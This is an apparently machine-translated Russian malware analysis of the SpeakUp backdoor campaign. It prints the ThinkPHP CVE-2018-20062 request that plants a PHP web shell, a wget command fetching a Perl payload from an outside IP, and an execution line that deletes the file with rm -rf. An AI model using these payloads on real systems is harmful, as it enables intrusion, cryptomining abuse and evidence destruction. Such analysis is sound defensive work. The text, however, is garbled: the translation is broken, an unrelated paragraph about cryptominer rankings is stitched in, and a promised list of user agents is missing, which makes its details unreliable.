В январе 2019 года исследование по кибератакам обнаружили новую кампанию, использующую серверы Linux для распространения бэкдора-трояна под названием SpeakUp. SpeakUp способен доставлять любую полезную нагрузку и выполнять ее на скомпрометированных компьютерах, а также предотвращает обнаружение антивирусным программным обеспечением всех поставщиков безопасности.
SpeakUp в настоящее время поставляет XMRig Miner и распространяется через серию эксплойтов, основанных на командах, которые он получает из своего центра управления. На данный момент в основном заражены машины в Восточной Азии и Латинской Америке, включая некоторые серверы, размещенные на AWS.
Угрозы, такие как SpeakUp, являются серьезным предупреждением о грядущих угрозах, поскольку они могут уклониться от обнаружения и затем распространять потенциально опасное вредоносное ПО на скомпрометированные машины. Поскольку Linux широко используется на корпоративных серверах, SpeakUp может быть угрозой, которая будет расти в масштабе и серьезности в течение года.
SpeakUp действует для внутреннего распространения в зараженной подсети и за ее пределы для новых диапазонов IP-адресов, используя уязвимости удаленного выполнения кода. Кроме того, в SpeakUp появилась возможность заражать устройства Mac необнаруженным бэкдором.
Хотя точная личность действующего лица, ответственного за эту новую атаку, до сих пор не подтверждена, исследование по кибербезопасности смогли сопоставить автора SpeakUp с разработчиком вредоносного ПО под именем Zettabit . Хотя SpeakUp реализован по-разному, он имеет много общего с мастерством Зеттабита.
Первоначальный вектор заражения нацелен на недавно обнаруженную уязвимость в ThinkPHP и использует методы внедрения команд для загрузки оболочки PHP, которая обслуживает и выполняет черный ход Perl.
Использование CVE-2018-20062 для загрузки оболочки PHP
С помощью запроса GET уязвимость удаленного выполнения команд в ThinkPHP (CVE-2018-20062) отправляется на целевой сервер, как показано ниже:
s = / index / \ think \ app / invokefunction & function = call_user_func_array & vars [0] = system & vars [1] [] = echo ^ <? php $ action = $ _GET ['module']; system ($ action) ;? ^ >> index.php
Эта оболочка выполняет команды, отправленные с помощью параметра «module» в запросе.
Обслуживая черный ход
Еще один HTTP-запрос отправляется на целевой сервер со следующим ресурсом:
/? module = wget hxxp: // 67 [.] 209.177.163 / ibus -O / tmp / e3ac24a0bcddfacd010a6c10f4a814bc
Приведенный выше стандартный впрыск извлекает полезную нагрузку ibus и сохраняет ее в / tmp / e3ac24a0bcddfacd010a6c10f4a814bc
Выполнение выдается с использованием дополнительного HTTP-запроса:
/? module = perl / tmp / e3ac24a0bcddfacd010a6c10f4a814bc ; sleep 2; rm -rf / tmp / e3ac24a0bcddfacd010a6c10f4a814bc
Это выполняет сценарий perl, переводит его в спящий режим на две секунды и удаляет файл, чтобы удалить все доказательства.
Cryptominers остаются преобладающими, снова заполняя лучшие 4 позиции в индексе, и Coinhive сохраняет свое место наверху списка. Повсеместно распространены вредоносные многоцелевые формы вредоносного ПО, причем половина всех форм вредоносного ПО в первой десятке в настоящее время может загружать дополнительное вредоносное ПО на зараженные машины и распространять различные угрозы.
После завершения процесса регистрации SpeakUp постоянно связывается со своим C & C для новых задач с фиксированным интервалом «выбивания».
Следующие типы команд доступны C & C:
«Newtask» - выполняет произвольный код на локальном компьютере, загружает и выполняет файл с любого удаленного сервера, уничтожает или удаляет программу и отправляет обновленные данные отпечатков пальцев.
«Notask» - выспитесь 3 секунды и попросите дополнительную команду.
newerconfig »- обновляет загруженный файл конфигурации майнера.
Постоянство SpeakUp обеспечивается использованием cron и внутреннего мьютекса, чтобы гарантировать, что только один экземпляр остается живым всегда.
Как только жертва успешно зарегистрирована, C & C начинает посылать новые задачи. Большинство из них манипулируют машиной для загрузки и запуска различных файлов.
Интересным моментом для упоминания является использование пользовательских агентов. SpeakUp определяет трех пользовательских агентов, которые зараженная машина должна использовать при каждом обмене данными со своим C & C. Два из них являются пользовательскими агентами MacOS X, а третий - хэшированная строка:
Запутанная полезная нагрузка и техника распространения SpeakUp, вне всякого сомнения, создают большую угрозу в процессе создания. Трудно представить, чтобы кто-нибудь создал такой сложный массив полезных нагрузок, чтобы развернуть несколько майнеров. Актер угрозы, стоящий за этой кампанией, может в любой момент развернуть дополнительные полезные нагрузки, потенциально более навязчивые и оскорбительные, а может и нет, но во всяком случае у него есть такие возможности, вопрос воспользуется ли он ими. Он имеет возможность сканировать окружающую сеть зараженного сервера и распространять вредоносное ПО. Эта кампания, хотя и является относительно новой, может развиться во что-то большее и потенциально опасное.
just remember this you can never be too safe on the internet ↔ просто помните, что вы никогда не сможете быть слишком безопасными в интернете
